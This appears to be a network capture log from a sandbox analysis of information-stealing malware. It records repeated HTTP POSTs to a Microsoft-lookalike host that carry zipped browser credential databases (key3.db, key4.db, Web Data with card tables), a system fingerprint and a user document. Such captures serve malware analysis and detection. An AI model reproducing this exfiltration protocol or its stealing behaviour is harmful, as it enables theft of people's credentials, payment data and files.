May 10, 2025 08:05:43.847773075 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:44.319427967 CEST	703	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:44 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beH5WKSZJN0C4JbS466IFslIWf1aKcEW0rF2yZ%2F0stvCSYPYaLf8Q0EyeVMRxzBedYqXENtkP%2B4h4KDJGzvGJwOR90lBb7dAf0FHYfljuAvJVUP16LD2eiZDMBmqAmarudP4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f1c9c095711-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141123&min_rtt=141123&rtt_var=70561&sent=23&recv=33&lost=0&retrans=0&sent_bytes=0&recv_bytes=41772&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:44.586924076 CEST	13580	OUT	POST /Up/b HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 623250 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@ .jz<{{{a{zz<z [TRUNCATED]
May 10, 2025 08:05:44.727869987 CEST	9506	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:44.728013992 CEST	17654	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:44.869349003 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:44.869518042 CEST	51604	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:45.011351109 CEST	1358	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:45.011447906 CEST	25802	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:45.011557102 CEST	21728	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:45.011624098 CEST	16296	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:45.011684895 CEST	13580	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:45.011737108 CEST	6790	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:46.166557074 CEST	716	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:46 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2F0flg6yYBmnB29Ez%2BuMos42czo76A7ipXz%2FhauZZcl4vEpIgRJlk6vha%2FT8DIMVOT1VZn%2BJG8eTRVOxxROO8cthQKM%2FU7EBkc4XFe157nixMBYubgf%2BZ0jJPbjpyq0K6QKU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f2228cfb66b-PHX server-timing: cfL4;desc="?proto=TCP&rtt=140951&min_rtt=140951&rtt_var=70475&sent=270&recv=463&lost=0&retrans=0&sent_bytes=0&recv_bytes=623380&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:46.381714106 CEST	612	OUT	POST /Up/p HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 485 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 42 19 07 7a 33 01 00 00 33 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 6a 6f 6e 65 73 22 2c 22 70 22 3a 22 4a 4f 4e 45 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 [TRUNCATED] Data Ascii: PK\d!RBz33(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display Adapter"]}PK\d!RBz33(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKVy
May 10, 2025 08:05:46.677840948 CEST	707	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:46 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnuVyqGOQHpNg%2FPXX%2FLuu0ajUdEWO993sp4IIvF5ACsZY8Zk16qhh%2F71K1VK40hmQDZsZJRuki%2B3JVleZ0gHSgkudgp4hSy6AiuaXlhp3QTfwwPU1jRvNtSX82trkl%2F%2FxqNi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f2d583797fd-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141845&min_rtt=141845&rtt_var=70922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=612&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:48.233824968 CEST	13580	OUT	POST /Up/b HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 139949 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 74 aa 79 19 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 06 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: PK\d!Rty b/c8/0/Web DataSQLite format 3@ DJ.zp< [TRUNCATED]
May 10, 2025 08:05:48.375174999 CEST	8148	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.375255108 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.375293970 CEST	2716	OUT	Data Raw: 72 76 65 72 5f 63 61 72 64 5f 6d 65 74 61 64 61 74 61 13 43 52 45 41 54 45 20 54 41 42 4c 45 20 73 65 72 76 65 72 5f 63 61 72 64 5f 6d 65 74 61 64 61 74 61 20 28 69 64 20 56 41 52 43 48 41 52 20 4e 4f 54 20 4e 55 4c 4c 2c 20 75 73 65 5f 63 6f 75 Data Ascii: rver_card_metadataCREATE TABLE server_card_metadata (id VARCHAR NOT NULL, use_count INTEGER NOT NULL DEFAULT 0, use_date INTEGER NOT NULL DEFAULT 0, billing_address_id VARCHAR)-??Etableautofi
May 10, 2025 08:05:48.375313044 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.375349998 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.375559092 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.517231941 CEST	10864	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.517334938 CEST	43456	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.659492970 CEST	16296	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:48.659563065 CEST	28723	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.011706114 CEST	711	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:48 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FoOGlGGqPfEQFfPtqMJO%2FVw6j7Iq6CZexNOlvmMTVObLtZqYnLxDblq4XS1JweUuRrvb8xnZkZQzkXnDx3H4auo4PtAxwG0Ae8qI%2FLgh%2B6DP1CAe%2B6%2BLzf4ApWEEvkco2RWM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f38ed580111-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141143&min_rtt=141143&rtt_var=70571&sent=73&recv=106&lost=0&retrans=0&sent_bytes=0&recv_bytes=140079&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:49.286974907 CEST	13580	OUT	POST /Up/b HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 524954 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@ .jz<{{{a{zz<z [TRUNCATED]
May 10, 2025 08:05:49.428000927 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.428132057 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.428175926 CEST	8148	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.428301096 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.428339958 CEST	8148	OUT	Data Raw: 35 35 2c 20 61 63 65 35 33 34 33 35 36 2c 20 61 63 65 35 33 34 33 35 37 2c 20 61 63 65 35 33 34 33 35 38 2c 20 61 63 65 35 33 34 33 36 34 2c 20 61 63 65 35 33 34 33 36 35 2c 20 61 63 65 35 33 34 33 36 36 2c 20 61 63 65 35 33 34 33 36 37 2c 20 61 Data Ascii: 55, ace534356, ace534357, ace534358, ace534364, ace534365, ace534366, ace534367, ace534368, ace534369, ace534373, ace534374, ace536351, ace536352, ace536353, ace536354, ace536355, ace536356, ace536357, ace536358, ace536359, ace53635a, ace53635
May 10, 2025 08:05:49.569861889 CEST	31234	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.569909096 CEST	17654	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.569991112 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.712431908 CEST	63826	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:49.712639093 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:50.852917910 CEST	706	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:50 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WaYLvIvT4F8G1gbU1VSwh4vg1pLlkVS4pn8XjuV%2B2ci81ULVmk9L7izkzK5xknweEA3FRolja504yAZ5aIbMaKNWjBg0prMQcYDCow1cideQw64LWM1MhptPadgG2Z%2FwQ3v9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f3f8d4142d9-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141076&min_rtt=141076&rtt_var=70538&sent=246&recv=390&lost=0&retrans=0&sent_bytes=0&recv_bytes=525084&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:51.524108887 CEST	13580	OUT	POST /Up/g HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 14506 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 95 6c 05 f3 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 95 fa 9e d0 02 04 00 00 02 04 00 00 32 00 00 00 67 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 41 46 57 41 41 46 52 58 4b 4f 2f 41 46 57 41 41 46 52 58 4b 4f 2e 64 6f 63 78 41 46 57 41 41 46 52 58 4b 4f 49 4d 59 55 54 45 42 4b 4c 43 46 59 55 53 4d 50 4b 42 4c 4c 56 4c 59 43 5a 53 42 59 51 41 52 52 42 49 44 4e 4d 59 4c 50 4c 47 41 49 4a 59 42 50 58 5a 52 52 43 44 4b 57 55 4a 43 5a 46 4e 5a 59 57 4a 4c 4a 57 43 50 50 4e 57 4e 42 55 4e 55 4b 57 4b 41 4e 41 46 4a 54 47 53 4d 4e 44 4e 41 49 50 57 59 43 43 55 47 5a 54 57 43 58 49 44 55 48 4c 4b 44 49 49 46 58 56 5a 5a 43 42 4b 54 4b 5a 58 4b [TRUNCATED] Data Ascii: PK\d!Rl00(f1575b64-8492-4e8b-b102-4d26e8c70371.txt1746857132929e146be9-c76a-4720-bcdb-53011b87bd06PK\d!R2g/Users/user/Documents/AFWAAFRXKO/AFWAAFRXKO.docxAFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZN [TRUNCATED]
